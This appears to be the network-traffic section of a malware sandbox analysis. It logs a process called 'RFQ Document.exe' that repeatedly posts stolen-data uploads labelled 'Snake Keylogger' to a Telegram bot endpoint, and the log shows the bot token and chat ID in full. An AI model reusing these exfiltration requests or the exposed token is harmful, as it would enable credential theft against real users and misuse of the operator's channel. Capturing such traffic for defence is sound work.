                                            2021-09-28 05:59:02 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 39 34 64 65 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da94deb0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:02 UTC231INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:02 UTC231INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12731,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            145192.168.2.449944149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC231OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dab3dcf1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:02 UTC232OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 62 33 64 63 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dab3dcf1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:02 UTC232INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:02 UTC233INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12732,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            146192.168.2.449948149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC233OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255dad2dbd1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:02 UTC233OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 64 32 64 62 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255dad2dbd1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:02 UTC234INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:02 UTC234INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12733,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            147192.168.2.449950149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC235OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255daef78f9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:02 UTC235OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 65 66 37 38 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255daef78f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:02 UTC235INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:02 UTC236INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12734,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            148192.168.2.449951149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC236OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255db074f2c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:02 UTC237OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 30 37 34 66 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255db074f2cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:03 UTC237INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:03 UTC237INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12735,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            149192.168.2.449953149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:03 UTC238OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255db2d74a4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:03 UTC238OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 62 32 64 37 34 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255db2d74a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:03 UTC239INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:03 UTC239INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12736,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808743,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            15192.168.2.449789149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:23 UTC23OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c3a2432d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:23 UTC24OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 61 32 34 33 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c3a2432dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:23 UTC24INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:23 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:23 UTC24INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12594,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            150192.168.2.449956149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:03 UTC239OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255db6b7218
                                            Host: api.telegram.org
                                            Content-Length: 407
